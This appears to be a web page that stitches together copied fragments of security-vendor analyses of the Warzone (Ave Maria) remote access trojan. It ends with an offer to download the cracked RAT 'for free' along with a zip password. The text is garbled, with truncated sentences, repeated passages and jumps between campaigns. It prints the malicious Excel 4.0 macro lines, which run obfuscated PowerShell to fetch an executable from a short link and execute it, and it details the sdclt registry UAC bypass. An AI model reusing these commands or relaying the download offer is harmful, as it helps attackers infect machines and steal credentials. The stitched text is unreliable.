WarZone Rat Is FUD Bypass Antivirus

research team identified an XLS document that downloaded a highly vicious payload named Warzone RAT. The payload, also known

WarZone RAT first emerged as malware-as-a-service (MaaS) and is known for its aggressive use of “.docx” files as its initial infection

 this Malware Analysis Spotlight, we highlight the execution of a packed  WarZone RAT is a Remote Access Trojan which was 

Research team identified an XLS document that downloaded a highly vicious payload named Warzone RAT. The payload, also known as “Ave Maria stealer,” can steal credentials and log keystrokes on the victim’s machine. Checkpoint mentioned WarZone early this year when the malware was in its early stage of development.

The latest version of the malware is fully developed and is being sold in the underground market. The Warzone authors have an official website where cybercriminals can buy the malware.

The Warzone developers rent out several products on their website:

  • RAT
  • RAT Poison
  • Crypter
  • SILENT.doc exploit
  • SILENT EXCEL Exploit

Here are various features of the RAT noted on the website:

  • Native, independent stub
  • Remote Desktop
  • Hidden Remote Desktop – HRDP
  • Privilege Escalation – UAC Bypass
  • Remote WebCam
  • Password Recovery
  • File Manager
  • Download & Execute
  • Live Keylogger
  • Offline Keylogger
  • Remote Shell
  • Process Manager
  • Reverse Proxy
  • Automatic Tasks
  • Mass Execute
  • Smart Updater
  • HRDP WAN Direct Connection
  • Persistence
  • Windows Defender Bypass

We also discovered a cracked version of Warzone hosted on www.masterscyber.com

The instance of WarZone Rat we trapped has the ability to bypass UAC on the latest version of Windows 10. In this blog we’re going to talk about the XLS used as the attack vector and the UAC bypass technique used

The malicious XLS

The XLS used in the attack uses Excel 4.0 Macro, also known as XLM Macro. The XLM Macro feature has been part of Microsoft Excel for a long time, but we’ve seen a spike in its malicious usage for a few months now. Malware authors exploit this feature of Excel, which allows formulas to be written using macros.

When we got hold of the XLS on November 11, only a few of the anti-malware vendors could detect it on Virustotal (see figure 3).

In the XLS file, the macros are implemented as formulas in a hidden sheet and are not visible if the XLS is opened. The macros are visible only after unhiding the sheet. The following screenshot shows the unhidden sheet with macro code embedded in the formula.

Here’s the macro code in respective rows and columns:

  • Row 596 column E – =CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&”powe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).(‘Down’+’loadFile’).””””Invoke””””(‘https://cutt.ly/agJgRCy’,’gm.exe’)”
  • Row 597 column E – =CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&”powe^rshell -w 1 stARt`-slE`Ep 20; Move-Item “”gm.exe”” -Destination “”${enV`:appdata}”””
  • Row 598 column E – =CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&”powe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./gm.exe”

These macros are responsible for downloading and executing the Warzone RAT. The Warzone payload takes full control of the system after bypassing UAC and then steals information and monitors the victim’s machine.

Here’s the flow of the attack:

  • The macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT
  • Gm.exe bypasses UAC to run at high integrity level
  • Gm.exe copies itself to %programdata% with the name Images.exe and then executes it. Images.exe runs at high integrity level

The image below describes the flow of the attack.

The flow of attack.

The Warzone RAT payload: Win over the UAC

The Warzone RAT (gm.exe) is a 32-bit application and uses the sdclt.exe to bypass UAC and run at higher privileges. Sdclt.exe is a built-in Windows utility used for backup and restore purposes. Sdclt is designed to autoevelate its privilege and uses the control panel binary, control.exe, to back up and restore control panel settings.

There are many UAC bypass techniques that are not effective on Windows 10 because of the default file system restrictions. A 32-bit application can’t access the native c:\windows\system32 directory because the operating system redirects the request to c:\windows\SysWOW64. Sdclt.exe and other UAC bypass binaries are 64-bit applications and are not available in the SysWOW64 directory.

However, the operating system provides a mechanism to disable the file system redirection using Wow64DisableWow64FsRedirection API. So Warzone uses the Wow64DisableWow64FsRedirection API to disable the file system redirection to access the sdclt.exe that resides in the system32 directory (see figure 6, below).

After disabling the redirection, the malware makes the following registry changes:

  • Creates a new registry key HKCU\Software\Classes\Folder\shell\open\command
  • Sets the “Default” value to “path of the malware”
  • Creates a value “DelegateExecute” and sets the value to “0”

The Warzone RAT can steal passwords from the following browsers:

  • Google Chrome
  • Epic Privacy Browser
  • Microsoft Edge
  • Opera
  • Tencent QQ Browser
  • Brave Browser
  • CenterBrowser
  • Blisk
  • Torch Browser
  • Slimjet browser

It steals the passwords that are stored in the browser databases. shows the query used to extract saved credentials in the browser.

Here are some more strings that can be used to identify and detect the unpacked Warzone payload inside memory:

  • warzone160
  • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
  • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe

Malware authors are always hunting for techniques that can bypass security. As mentioned earlier, the UAC bypass technique used by Warzone works on the latest version of Windows 10. We are seeing an increase in usage of the technique. In our intelligence database we have encountered some additional malware that uses the same technique to bypass UAC. Below is a screenshot (figure 15) of a VBA macro code found in an .xlsm sample (SHA256-70d400cbacc02f2417e742608c626c52698b07a42de3eb6e1ff4fea17d5bc0b6) using the API.

Warzone RAT is part of an APT campaign named “Confucius.” Confucius APT is known to target government sectors of China and few other South Asian countries. This APT campaign was quite active around January 2021. Warzone RAT first emerged in 2018 as malware-as-a-service (MaaS) and is known for its aggressive use of “.docx” files as its initial infection vector. The initial payload is known as “Ave Maria Stealer,” which can steal credentials and log keystrokes on the victim’s machine. The advanced version of this malware is currently sold in the underground market for $22.95 per month and $49.95 for three months. The Warzone creators have an official website where it’s up for sale.

Based on our research, we confirmed that the threat actor is trying to circumvent attacks with a decoy and manipulate users, delivering the next stage payload via template injection technique. In this blog, we are going to talk about “.docx” used as an initial attack vector and how it’s delivering its final payload -Warzone RAT.

Download WarZone Rat For Free

Zip Password: www.masterscyber.com